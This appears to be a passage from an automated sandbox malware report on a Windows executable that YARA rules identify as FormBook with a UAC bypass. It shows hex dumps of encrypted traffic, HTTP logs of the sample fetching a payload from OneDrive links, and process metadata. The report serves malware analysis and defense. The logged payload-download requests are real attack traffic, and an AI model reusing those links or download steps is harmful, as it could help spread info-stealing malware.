                                                                                                                                        2022-08-08 18:12:31 UTC90INData Raw: 79 43 c6 d2 42 33 4f 28 54 a9 c0 55 86 0c c5 4f 1c 8c 2d 79 d0 62 c3 7a 69 7c b6 b2 60 03 d5 3f 42 c7 ca b1 bc 25 53 36 d1 9f 1f cc 8b 0f 2e 39 81 a0 8d a1 0e a9 23 12 43 18 73 0c fd 85 61 c3 15 10 51 2f 79 e4 cb 50 6a 96 74 21 33 25 37 4f 2a b0 a9 66 49 a7 ae 2f d0 36 aa 51 ce b0 31 be 2d b7 ac 41 b5 b0 da 28 52 42 21 72 79 f9 25 53 61 54 39 46 7d ad c4 8d 4f a8 0a 53 76 5f 54 d3 6c a0 eb c2 23 c6 31 1d 38 cf 05 66 42 27 19 de 46 c4 d6 47 4a d2 42 b0 27 41 a5 b8 d2 ce 2f 35 21 99 21 de 38 31 51 36 66 36 ac c5 ad cd 17 50 d6 36 97 5c 23 18 64 13 47 39 08 8c 35 53 48 c9 a2 20 43 6f ae 39 38 08 94 12 ee cf 9e c1 cb 49 b0 2f ca 43 3b b4 40 1d a4 b9 ec 0b 4c 52 fb 43 18 25 a2 20 43 66 49 a7 c9 3a c2 30 be 19 13 32 63 34 8d 0b c0 9e 7d 96 ba d5 3b 42 94 5e 49
                                                                                                                                        Data Ascii: yCB3O(TUO-ybzi|`?B%S6.9#CsaQ/yPjt!3%7O*fI/6Q1-A(RB!ry%SaT9F}OSv_Tl#18fB'FGJB'A/5!!81Q6f6P6\#dG95SH Co98I/C;@LRC% CfI:02c4};B^I
                                                                                                                                        2022-08-08 18:12:31 UTC98INData Raw: d1 aa b2 dd ae ba 52 d3 c6 ac 95 b7 c2 56 98 1f 92 b6 aa 4d 2a c9 53 36 d1 9f 1f 73 de fe a8 d8 a3 7b 88 05 7e 54 31 1f ba 36 33 35 47 40 b0 2f 31 b5 33 2b 79 e4 b6 45 b1 ba e0 b7 ba 19 46 cb cd b0 40 86 b6 2b bd bf a8 1d 0a 3a 27 bd a6 bc a6 1b a8 dc b5 58 da 28 52 42 21 d8 83 2e 00 c3 d7 92 5a 4e d5 08 13 8c 70 bd 1b bc 5a 38 b6 b6 ac a9 be 1d 7d e6 35 47 3a 23 dc 9b 2f 1b 2c 5a c1 c4 7e 74 21 37 c7 c3 1f 1d 10 ab bc c5 17 c2 8a 35 1d 43 38 bd 51 36 66 36 ac 70 f1 7d 96 17 6e d7 b4 b2 aa 08 e2 27 3a 27 49 9f 31 21 40 c5 cd 23 50 6e 2d 2d bd c5 b6 c6 1c 34 33 c1 9e 29 96 b6 23 49 9b bf 49 2c 4e 44 aa 5e e4 3d 88 6d e9 26 fb 01 ef cf b6 2f 2b 3a be 25 d6 38 b6 2d 2d b7 be be 18 c8 bc e4 b3 25 ca 42 1b b8 b1 cf d1 bc ce dd 29 a8 bf c5 31 d5 10 ab b4 5e 11
                                                                                                                                        Data Ascii: RVM*S6s{~T1635G@/13+yEF@+:'X(RB!.ZNpZ8}5G:#/,Z~t!75C8Q6f6p}n':'I1!@#Pn--43)#II,ND^=m&/+:%8--%B)1^
                                                                                                                                        2022-08-08 18:12:31 UTC106INData Raw: 68 c3 9e ed 29 36 a3 41 cc a2 a3 c8 31 9b 2f 83 de 18 b5 71 41 df 37 c6 d0 68 94 f9 2e c6 ae 5c fd 2e 3d d7 a4 c5 86 50 47 d1 6c 5c 9f 98 c2 a8 51 70 68 75 7c 1b 0e 84 da 72 ae c3 04 47 a0 bc d0 b8 13 04 3a f8 7d a5 cd 16 4f 2b 95 86 3d 8c 0e 27 63 21 a6 01 87 05 eb b6 47 4d bb 85 81 35 08 37 f9 48 d6 11 f6 cf 56 c9 50 44 96 07 2e df 3d da 83 20 e8 81 43 fd fb 9a 54 cf 96 e8 75 f9 52 06 00 34 df 23 d4 51 2c 91 0f 37 74 b2 d7 9d 7c e5 51 8a dd 0b cf 51 49 70 3a a6 e8 30 56 fc 29 dc 76 cc b4 28 dd ca 21 ad 89 1b 02 5e e8 c5 5f 54 22 89 b9 f0 9c 82 bc 91 a0 f0 55 f2 66 d9 5d cf 25 c7 6a be f8 ed 7a 54 ec 8f 36 b9 ef dc 07 14 ab c7 78 35 48 cc e1 29 83 26 49 79 72 b2 b5 1d 4f 21 55 3b 55 09 75 8c 3f 1b c6 5b 80 9b 53 42 ee b1 93 e4 86 fe ae 4d 32 c8 7c d9 62
                                                                                                                                        Data Ascii: h)6A1/qA7h.\.=PGl\Qphu|rG:}O+='c!GM57HVPD.= CTuR4#Q,7t|QQIp:0V)v(!^_T"Uf]%jzT6x5H)&IyrO!U;Uu?[SBM2|b
                                                                                                                                        2022-08-08 18:12:31 UTC114INData Raw: 78 82 6a 70 e9 f1 76 08 c9 30 cd 44 1b 1d 69 82 2a c1 cf c1 d6 55 1b 74 3b c3 bd 54 55 ca c2 27 fd fa bd cf c3 f3 76 23 cd 60 5c b7 c8 bc 1a e8 d7 04 c9 54 c1 66 99 53 27 0e 65 18 b9 9f cd 3a c7 49 9f d8 33 1c c4 19 e4 a9 5a d2 a1 10 13 ed b7 98 93 73 11 8a 70 8e 37 41 ea aa 4b ce c8 ae 4d b1 2d 92 12 51 bf 7f e6 cd 60 8c 08 dd be b0 f1 d1 49 b6 38 31 39 36 62 3f b7 d5 40 bf c5 c7 5c 60 66 41 27 54 cf d1 bf 27 49 93 c1 37 d4 c8 9c 0f 7e 39 4a e0 d6 d5 ce 39 bc e9 22 f7 66 7b 4e 82 2a b4 d8 42 c9 4d 51 f7 b9 54 c1 b2 00 da 46 f6 73 55 a9 15 f4 65 38 4e cd 60 f2 41 c4 16 dc 56 57 39 63 f4 45 a5 c7 5c d7 ee d0 27 54 cf 3d ac 02 e0 49 50 4e 54 49 e2 21 ba ee 07 64 bd a0 e6 89 49 cc 34 50 5a 54 aa 43 ae e5 51 0a 13 86 9f 15 a4 13 c0 0e 53 c7 c3 cb 5a 78 21 2d
                                                                                                                                        Data Ascii: xjpv0Di*Ut;TU'v#`\TfS'e:I3Zsp7AKM-Q`I8196b?@\`fA'T'I7~9J9"f{N*BMQTFsUe8N`AVW9cE\'T=IPNTI!dI4PZTCQSZx!-
                                                                                                                                        2022-08-08 18:12:31 UTC122INData Raw: 2d 70 da 40 c5 9c 3b 7d 39 52 4c 48 66 a9 46 5a 5c d5 80 86 ac 31 54 3a 5c d1 60 29 3b 4e 93 bf d3 52 49 4a 68 2d 3e 33 a1 c7 bf da 75 f7 33 ac 9b 49 9d c1 8a c5 c5 d7 b4 d2 c5 1e c9 bd c5 58 4a 3a 36 d1 c1 e6 fc db b2 ef ae 99 c7 c5 55 a9 d9 b6 21 6c de 99 c7 96 cb cd 5a 54 28 40 d3 4c bb ee e9 33 b0 c1 25 36 52 d3 48 b0 3b c3 20 bb cd 66 ca 21 7e b6 97 55 38 d3 c5 e6 f7 e7 b6 a8 95 be ab 56 0b 64 bd bf 5a cc a9 d3 d1 52 e0 ca c2 c7 c7 3d 5e c7 56 e0 f1 c1 54 48 b8 cc cd fe 7f e6 8d cd 4c 5e c8 49 e5 1d 7c 55 9d bd c5 d2 d1 6a c0 1f 84 1b b7 60 03 cd 66 bd c7 d8 b1 5e 60 bb 4f dd 33 23 1b dc 40 c9 cc a9 56 5e 5e 29 3b d1 12 c1 d3 d1 cc 10 dd ae 8f 31 b7 5e c7 ca fa 82 23 27 22 e0 b5 2d c7 c3 d1 d5 36 a9 5e c5 d1 6e d0 1d 91 55 19 1b 4c be b0 eb d8 a3 b6
                                                                                                                                        Data Ascii: -p@;}9RLHfFZ\1T:\`);NRIJh->3u3IXJ:6U!lZT(@L3%6RH; f!~U8VdZR=^VTHL^I|Uj`f^`O3#@V^^);1^#'"-6^nUL
                                                                                                                                        2022-08-08 18:12:31 UTC130INData Raw: c0 38 b2 99 27 60 bd ca 9b d1 5a 9f d3 e5 c0 2a 3f b5 c2 fb 50 60 c6 f0 d2 b0 5a 2b 55 c6 36 1d 8b 41 9d b2 bd c5 d8 2a 60 4c 9b 19 7c b0 7d bc b5 c4 0d 1f c9 e6 f4 7f d2 1f dc 9b c7 c5 a9 fa d9 b6 b2 3b b5 2d df 4f 2c c0 62 4c 31 42 62 bd 32 fe e9 b8 e5 41 3a d3 52 b3 47 7c b6 c0 3f b1 c0 4a 19 38 35 55 cf d1 32 59 dd b8 cd 3b 42 c5 cd 40 13 6e 37 37 b9 49 a5 21 4d d3 d1 2c ca dd ae bb 31 b7 93 11 6a 2c fb 11 4a 8c 0c 3d 5e c7 50 ab 53 4b a8 22 c8 b6 03 3a cd 60 d8 0c dd 1f 33 d4 34 21 d5 54 c1 fb 39 2a 5e 71 3a 66 54 08 d3 e7 be bb 0f 50 4e 54 9e 32 a7 4c 56 ad 75 e5 54 d3 c3 17 dc 49 c1 2b ee d6 d7 43 79 33 19 bf ae 56 4d 7d 6c e0 39 07 e5 4f e0 eb cc 47 74 49 49 f3 53 57 dd d6 d6 9c bd d5 de 8d 48 23 c1 dc 89 0f 2f d7 56 4e 8c b3 28 c2 49 a6 85 f8 f3
                                                                                                                                        Data Ascii: 8'`Z*?P`Z+U6A*`L|};-O,bL1Bb2A:RG|?J85U2Y;B@n77I!M,1j,J=^PSK":`34!T9*^q:fTPNT2LVuTI+Cy3VM}l9OGtIISWH#/VN(I
                                                                                                                                        2022-08-08 18:12:31 UTC138INData Raw: d7 de 8d ac 50 60 4a cd fd c7 bf 5e 0f 16 36 2f 65 40 c2 a8 23 e0 d1 e0 54 a9 a8 1a 38 02 42 aa 68 8b ee 8e f6 26 13 6c 3a 8d b5 8a a6 d8 d6 51 11 16 ad 2d 12 51 f5 61 2f 91 4d 4c 5e 11 22 e5 23 be d1 0f bd 90 ae 27 d6 36 52 64 11 31 78 ae da 13 56 4e d7 71 53 b0 7f dc 31 d6 ca 1b 79 c8 5c d1 2e 39 86 b8 ae 85 ce b5 4c d3 e5 10 f3 a8 bd 8a 8f ae 99 c7 c5 89 80 d9 54 12 e0 0c bc c7 96 18 49 a7 da 0b 93 0d bd f2 5d dc 16 92 c5 ec f2 3f 79 fd 64 f0 71 4d 16 a2 66 fe fe 4b 0a a0 d1 02 f2 c8 6e 8e bf 25 04 e0 72 03 56 ba 65 d0 ed 0d 52 c4 f2 dc e7 a4 c5 2f fe e2 6c 11 c7 35 e8 57 35 08 3f 4c 52 55 bd db 33 2f 33 52 9b 08 94 72 3a 88 91 f8 9c 15 bd d3 b2 ca 8b 4f c5 50 60 53 8b c9 f9 d1 49 48 a6 34 bf d3 c5 c9 c1 bf 25 d8 e4 89 a8 88 6d 43 d0 75 0d c3 43 d3 d1
                                                                                                                                        Data Ascii: P`J^6/e@#T8Bh&l:Q-Qa/ML^"#'6Rd1xVNqS1y\.9LTI]?ydqMfKn%rVeR/l5W5?LRU3/3Rr:OP`SIH4%mCuC
                                                                                                                                        2022-08-08 18:12:31 UTC146INData Raw: d3 98 5a 0f 4e 54 54 d0 4f 85 56 c6 64 fb 54 d3 c3 4d dc 18 c1 f9 c5 94 4e 5e c1 3b c8 0c c9 88 c1 a8 c3 bd c3 77 c8 0a 29 8d 02 bd cf 54 6b 3a 38 3d 8d 57 bd c5 dd 5b 6a c0 52 64 4a 38 de b1 c0 d7 56 bb 09 ab 28 33 bd d3 d0 9d c1 bf 68 65 f5 d1 bd 52 3e 9b d6 9c 62 ff 4c fd 60 50 cf a1 cc 16 cf 8c 5e ff 54 58 5e a9 3b 7b 4c 92 5e 8a 52 5a c9 2c 43 97 c5 41 bd 98 cd 60 5e ad ca 14 d3 9c d3 ff d5 54 54 34 39 24 66 15 bf 9e c5 5e d5 47 dc 0c 5a 8e bf 9c 54 5c 64 d0 39 97 64 fd c5 be c3 bd d7 51 ce 22 c5 23 bf c0 c1 cf c3 02 e6 93 c1 a8 52 dc c3 cf c3 88 e4 24 60 25 5e 55 d3 4c bb 13 de 93 ae f7 5f 62 c3 d7 fd 4b 42 50 60 76 91 7e b4 bf 66 bb c4 4f 38 be 54 cb 50 2f 3a 42 2f 62 4c 43 99 64 bd 68 76 6a 4c d3 d1 8c 5a 54 52 1f e0 79 5e 09 c5 15 cb 50 c5 b6 43
                                                                                                                                        Data Ascii: ZNTTOVdTMN^;w)Tk:8=W[jRdJ8V(3heR>bL`P^TX^;{L^RZ,CA`^TT49$f^GZT\d9dQ"#R$`%^UL_bKBP`v~fO8TP/:B/bLCdhvjLZTRy^PC
                                                                                                                                        2022-08-08 18:12:31 UTC154INData Raw: 07 bd 62 d5 c1 2c 42 50 8a d7 0c 53 c7 c5 86 ca d9 1d 21 54 de 9b c7 c3 cb b7 dc 2d 1e ca b2 81 d2 cd 60 cf c3 dd b4 be 4a 2d b5 c6 54 c1 64 56 2a a1 c7 bd 64 25 94 d1 bf d3 64 55 c0 0b c0 50 4d b0 10 3b cf d5 72 1e 7a 1b 1f 62 60 c5 cb 49 3f 38 d3 0c 53 c7 56 64 71 d9 19 c3 bd 56 5e 38 44 29 5e 15 e9 10 c4 aa 81 d2 74 4b cb 4c 7e 5e eb 48 a6 37 11 54 c1 ef 6c f5 2f b4 4e d7 50 cf 3d 43 34 b9 26 cc bf 56 48 09 78 21 37 0b d5 4c c1 62 ad ab 60 a4 1d cb c5 50 22 53 31 1e c8 25 95 57 50 c5 58 85 6a 37 25 52 5a c9 60 e0 2a 42 62 4e 52 a3 e9 29 4c 54 b9 d3 3d 34 c3 d5 c1 50 cc 3a e6 ff c7 bf 66 13 85 d1 4c 5e 93 82 23 4e 54 c1 cd a7 ab c7 cf 7a e6 dd 2b 21 bd 62 d5 c1 e4 42 c4 8a 4b d5 ae 7b c8 58 cb df 15 6a 25 1f cf 56 c7 cb 32 a7 ba 0b 29 0d 4e 8a 5c d4 5b
                                                                                                                                        Data Ascii: b,BPS!T-`J-TdV*d%dUPM;rzb`I?8SVdqV^8D)^tKL~^H7Tl/NP=C4&VHx!7Lb`P"S1%WPXj7%RZ`*BbNR)LT=4P:fL^#NTz+!bBK{Xj%V2)N\[
                                                                                                                                        2022-08-08 18:12:31 UTC162INData Raw: 12 52 5b c0 c8 cf 56 c5 c3 2a da 3c d7 60 be c5 69 99 9a 13 29 49 65 d3 c3 62 54 bf ca 0e 8b 65 8d 04 1e f8 66 54 5c d1 4b 62 54 5c cb 63 b1 3d cc d1 bd 50 54 cb b1 3d d3 c3 4a b9 6d ad 51 54 52 b9 c5 bf 2a 3d da 58 cb 50 54 84 3f 45 66 fd 43 cb cd d1 72 4d c6 6f 3a e9 d1 60 cb bb cf 52 9f 1c b2 c3 d5 52 58 cf 42 83 27 c7 bf 66 54 3a 36 7f 71 7f 5d c1 bf 56 c5 56 53 dc c7 cf d3 d5 c2 de ca bd 62 d7 cb ac b1 3b f4 d3 ca 6e 6d 86 2c 1a 4c 14 bf cc 4e 99 85 4e ba f5 93 0e 9b 48 48 0e 74 c5 88 03 a4 0d 95 18 f0 bd f0 b4 73 b5 b8 1f cd 66 c5 c7 52 47 bb 34 21 e7 08 8c a0 e3 88 f3 77 d0 e8 35 62 1a c1 fb c2 57 50 9c 45 e4 d3 8a 65 da 1b ff f4 e2 c6 d5 e0 b9 aa b7 1d fd 50 c8 08 69 19 9e a9 37 d1 a7 23 eb 68 1c 8c 9c 1a 90 8d e8 d2 4a a8 3d f8 22 d6 62 84 47 ed
                                                                                                                                        Data Ascii: R[V*<`i)IebTefT\KbT\c=PT=JmQTR*=XPT?EfCrMo:`RRXB'fT:6q]VVSb;nm,LNNHHtsfRG4!w5bWPEePi7#hJ="bG
                                                                                                                                        2022-08-08 18:12:31 UTC170INData Raw: c7 20 dc cb 4c 5a c5 eb 21 c3 de a3 a8 c1 d1 52 8d 99 40 bf 66 54 36 4d be 93 ca 62 7d d2 54 54 50 1d 74 1f bc 54 39 42 62 52 4c 83 4d c0 58 f8 02 d2 5e f2 5e c7 c5 74 55 c0 c5 3d 54 0e 53 56 52 54 c1 78 25 2d d5 ce 3a a9 a2 91 55 c5 79 d0 62 c3 4c 3d 7c a8 60 be b1 2f d7 56 bb 26 b3 28 a8 01 62 ca b6 7d d2 cd 40 5c d1 48 17 86 2d ae 19 2f c3 bd d7 91 3e 2c 27 d3 3b 28 c0 d2 42 b4 a6 1a ce bc 0e 41 52 5e 72 26 f3 b6 9b a6 ee 9e 31 4c 4e 5a c5 55 3a c5 4e 3d 67 eb 1f d5 54 56 54 a9 2a c4 56 4e 62 68 28 36 bf 60 e4 db d9 ac c5 c5 5e 5c 17 c7 cf 62 c9 ca a5 42 4c d3 d1 c1 f6 99 44 c7 4a 48 22 ca 54 58 c5 86 6c 1f 5c ac 99 25 52 5a c9 20 ab 99 c5 62 bd 9b e0 b0 1a d2 bd 81 de c3 62 cf 6c dd 19 33 66 41 a1 c7 bf 66 8f 53 b0 4c ee 04 57 50 5d 1d bd 13 a5 25 ba
                                                                                                                                        Data Ascii: LZ!R@fT6Mb}TTPtT9BbRLMX^^tU=TSVRTx%-:UybL=|`/V&(b}@\H-/>,';(BAR^r&1LNZU:N=gTVT*VNbh(6`^\bBLDJH"TXl\%RZ bbl3fAfSLWP]%
                                                                                                                                        2022-08-08 18:12:31 UTC186INData Raw: e0 20 ee 56 5e a3 a2 b3 d8 52 bf e8 37 d9 33 b6 c1 7f e2 50 cd 20 aa f1 5a c1 b3 21 0a b5 21 92 1b d3 13 a5 25 be d1 4f c9 3a c2 b2 7f 8e 43 3e 09 37 33 80 51 0a 2d 8d a0 82 a3 13 9e 96 54 cf d1 bf d3 c5 ba 2d 41 0c e7 a0 b0 bd 3b b2 18 d0 4b 62 c1 06 cd e9 ac 37 27 53 56 9a a8 66 19 40 c9 5a 21 b4 44 a9 c3 fc 33 7f e6 cd d3 d0 fd dd be ae d7 d0 36 5a 88 63 03 cf 5a de 7f 92 6a b5 94 17 cd 66 c7 bf 66 54 2f 1d 41 1a 15 78 8c 2f 54 c8 21 1c 41 d8 5e d7 77 4f 7a 1f b0 31 41 48 9e 1d bb 21 2a 50 5e 27 25 9f 9f c1 54 52 4c 6f 42 40 52 69 19 1c 41 5e 56 de 89 e7 c0 c2 5e 51 42 bd a6 dc 0d 50 4c c8 c4 1c 3b cd 66 27 33 d8 b1 cf 62 3f 8d dd c6 c1 bd 46 c5 20 53 21 56 5e 38 a5 ab a5 b0 b4 d3 d1 21 2b b3 46 bf cf 52 9d c7 2d 55 24 c1 54 b2 ac cc 9b c7 f0 c3 41 89
                                                                                                                                        Data Ascii: V^R73P Z!!%O:C>73Q-T-A;Kb7'SVf@Z!D36ZcZjffT/Ax/T!A^wOz1AH!*P^'%TRLoB@RiA^V^QBPL;f'3b?F S!V^8!+FR-U$TA
                                                                                                                                        2022-08-08 18:12:31 UTC202INData Raw: e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                        Data Ascii: y&&y]_ca&&y]]y


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        4192.168.2.34974913.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:41 UTC203OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                                                        User-Agent: lVali
                                                                                                                                        Host: onedrive.live.com
                                                                                                                                        Cookie: wla42=
                                                                                                                                        2022-08-08 18:12:42 UTC203INHTTP/1.1 302 Found
                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Expires: -1
                                                                                                                                        Location: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6IbuXIZ_2I4C3PojU1dZgDhrXJBVB63YBUJKqqRkP-IEkzXLZw71Of_tNPTtLGQqfZOrHxLg61l9viQ3pKXrp-sUeAuTKn0iPy-2cfCXZbcG_ZGSYZuCyLvmDB04kuOcNBkhE8CTxnABbCHzCt4JBOlJw/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                                                        Set-Cookie: E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:41 GMT; path=/
                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:42 GMT; path=/
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-MSNServer: RD0003FF11DA51
                                                                                                                                        X-ODWebServer: centralus1-odwebpl
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: 1D644258262448548D0F52989466A4E2 Ref B: VIEEDGE1607 Ref C: 2022-08-08T18:12:41Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:41 GMT
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        5192.168.2.34975113.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        2022-08-08 18:12:43 UTC204OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                                                        User-Agent: 6
                                                                                                                                        Host: onedrive.live.com
                                                                                                                                        Cookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
                                                                                                                                        2022-08-08 18:12:43 UTC204INHTTP/1.1 302 Found
                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Expires: -1
                                                                                                                                        Location: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB-APegcmQN7te3rF1BweJguh3qSXQtz5HjHD1Oeb1rhGAVZxlmJJDRuru-ZokmO3WslqCwp4uwH-0Bz-RAiuW8yOIz2aSjxSINj04gEiLnwj5gXsZIUGjF8OolqYoNBKg4xWUCyYnMRy1PGPoOtHn0Q/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                                                        Set-Cookie: E=P:vGe+lml52og=:ZhqIJdNqImi1evTziB19nFgjLEd6fVisP0u5IpOTZD0=:F; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:43 GMT; path=/
                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:43 GMT; path=/
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        X-MSNServer: RD00155D9975FB
                                                                                                                                        X-ODWebServer: eastus1-odwebpl
                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                        X-MSEdge-Ref: Ref A: AFD5B197D14F413AA0CBD099E840A394 Ref B: VIEEDGE1007 Ref C: 2022-08-08T18:12:43Z
                                                                                                                                        Date: Mon, 08 Aug 2022 18:12:43 GMT
                                                                                                                                        Connection: close
                                                                                                                                        Content-Length: 0


                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:20:12:05
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\TR0627729920002.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:938496 bytes
                                                                                                                                        MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low

                                                                                                                                        General

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:20:12:20
                                                                                                                                        Start date:08/08/2022
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                                                        Imagebase:0xc20000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
